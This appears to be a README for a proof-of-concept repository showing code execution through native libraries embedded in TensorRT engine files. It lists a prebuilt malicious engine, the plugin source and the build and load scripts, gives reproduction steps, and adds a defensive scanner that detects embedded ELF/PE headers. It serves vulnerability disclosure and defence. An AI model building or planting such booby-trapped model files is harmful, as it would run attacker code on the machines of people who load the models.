File size: 1,478 Bytes
a2de5f4
# TensorRT Engine File RCE PoC

## Vulnerability

Arbitrary code execution via embedded native shared libraries (DLL/SO) in TensorRT engine files (.engine/.trt/.plan). The embedded library's constructor (`DllMain`/`__attribute__((constructor))`) executes automatically when the engine is deserialized with `engine_host_code_allowed=True`.
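A defender-side check for this class of issue, added here as an example and not part of the PoC repository: scan an engine blob for embedded ELF or PE headers before loading it, and refuse to deserialize at all when `engine_host_code_allowed` is set on the runtime. `StubRuntime` and the `SAMPLE_*` blobs are constructed stand-ins so the check runs without a GPU; in production the `runtime` argument is a `tensorrt.Runtime`, whose `engine_host_code_allowed` attribute and `deserialize_cuda_engine` method the wrapper relies on.

```python
"""Defender-side check for TensorRT engine blobs: flag embedded native
shared libraries (ELF / PE) and refuse to deserialize when host code is
permitted. Added example; not code from the PoC repository."""
import struct
from dataclasses import dataclass

ELF_MAGIC = b"\x7fELF"
MZ_MAGIC = b"MZ"
PE_SIGNATURE = b"PE\0\0"


@dataclass(frozen=True)
class EmbeddedBinary:
    kind: str    # "ELF" or "PE"
    offset: int  # byte offset of the header inside the engine blob


def find_elf_headers(data: bytes) -> list:
    """Every \\x7fELF with a plausible e_ident (EI_CLASS and EI_DATA in {1, 2})."""
    hits = []
    pos = data.find(ELF_MAGIC)
    while pos != -1:
        if pos + 6 <= len(data) and data[pos + 4] in (1, 2) and data[pos + 5] in (1, 2):
            hits.append(EmbeddedBinary("ELF", pos))
        pos = data.find(ELF_MAGIC, pos + 1)
    return hits


def find_pe_headers(data: bytes) -> list:
    """Every MZ whose e_lfanew (DOS header offset 0x3c) points at a PE\\0\\0 signature.
    Requiring the signature keeps random 'MZ' byte pairs in weight data from matching."""
    hits = []
    pos = data.find(MZ_MAGIC)
    while pos != -1:
        if pos + 0x40 <= len(data):
            (e_lfanew,) = struct.unpack_from("<I", data, pos + 0x3C)
            sig_at = pos + e_lfanew
            # Bound e_lfanew so a wild value cannot point anywhere in a large blob.
            if 0x40 <= e_lfanew <= 0x10000 and data[sig_at:sig_at + 4] == PE_SIGNATURE:
                hits.append(EmbeddedBinary("PE", pos))
        pos = data.find(MZ_MAGIC, pos + 1)
    return hits


def scan_engine_bytes(data: bytes) -> list:
    """All embedded ELF/PE headers found in an engine blob, ordered by offset."""
    return sorted(find_elf_headers(data) + find_pe_headers(data), key=lambda h: h.offset)


class UnsafeEngineError(RuntimeError):
    pass


def load_engine_safely(runtime, data: bytes):
    """Gate deserialization: host code must be disabled on the runtime and the blob
    must carry no native binary. `runtime` is a tensorrt.Runtime (or a stand-in)."""
    if getattr(runtime, "engine_host_code_allowed", False):
        raise UnsafeEngineError("engine_host_code_allowed is set; refusing to load")
    hits = scan_engine_bytes(data)
    if hits:
        found = ", ".join(f"{h.kind}@{h.offset:#x}" for h in hits)
        raise UnsafeEngineError(f"embedded native binary found: {found}")
    return runtime.deserialize_cuda_engine(data)


# --- constructed sample inputs (not real TensorRT engines) ---
def _fake_pe() -> bytes:
    dos = bytearray(MZ_MAGIC + b"\0" * 0x3E)   # 0x40-byte DOS header
    struct.pack_into("<I", dos, 0x3C, 0x40)    # e_lfanew -> right after the DOS header
    return bytes(dos) + PE_SIGNATURE + b"\0" * 0x80


def _fake_elf() -> bytes:
    return ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\0" * 60  # ELFCLASS64, little-endian


SAMPLE_CLEAN = bytes(range(256)) * 4          # no MZ / \x7fELF byte sequences
SAMPLE_FALSE_MZ = b"MZ" + b"\0" * 100          # MZ without a PE signature (e_lfanew = 0)
SAMPLE_WITH_PE = b"TRTengine" + _fake_pe()     # PE header at offset 9
SAMPLE_WITH_ELF = b"TRTengine" + _fake_elf()   # ELF header at offset 9


class StubRuntime:
    """Stand-in for tensorrt.Runtime so the check can be exercised without a GPU."""
    def __init__(self, engine_host_code_allowed: bool = False):
        self.engine_host_code_allowed = engine_host_code_allowed

    def deserialize_cuda_engine(self, data: bytes):
        return f"engine({len(data)} bytes)"


if __name__ == "__main__":
    for name, blob in [("clean", SAMPLE_CLEAN), ("pe", SAMPLE_WITH_PE), ("elf", SAMPLE_WITH_ELF)]:
        try:
            print(name, "->", load_engine_safely(StubRuntime(), blob))
        except UnsafeEngineError as exc:
            print(name, "-> refused:", exc)
```

The header scan is a heuristic: it catches a library embedded verbatim, which is what this PoC describes, but not a payload that is compressed or encoded before embedding. The control that actually closes the hole is the first check, keeping `engine_host_code_allowed` off for any engine whose provenance is not established, with the scan as a second signal for inventorying engine files already on disk.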

## Files

| File | Description |
|---|---|
| `malicious_model.engine` | Crafted TensorRT engine with embedded malicious DLL |
| `malicious_plugin.c` | Source code of the malicious plugin |
| `build_poc.py` | Script to build the malicious engine |
| `load_poc.py` | Script to load the engine and trigger RCE |

## Reproduction

### Prerequisites
- NVIDIA GPU with CUDA drivers
- TensorRT 8.6+ (`pip install tensorrt`)
- C compiler (MSVC on Windows, GCC on Linux)

### Steps

```bash
# 1. Build the malicious engine (or use the pre-built malicious_model.engine)
python build_poc.py

# 2. Load the engine — triggers arbitrary code execution
python load_poc.py evidence/malicious_model.engine

# 3. Verify code execution
# Windows: check C:\temp\tensorrt_rce_poc.txt
# Linux: check /tmp/tensorrt_rce_poc
```

### Expected Output

```
[!] TensorRT RCE PoC: Arbitrary code executed via embedded plugin!
[!] Proof written to tensorrt_rce_poc.txt
[!] PID: <process_id>

[!!!] CODE EXECUTION CONFIRMED: C:\temp\tensorrt_rce_poc.txt
```

## Tested Environment
- Windows 10/11, NVIDIA RTX 4080 Super
- CUDA 13.0, TensorRT 10.15.1.29
- Python 3.12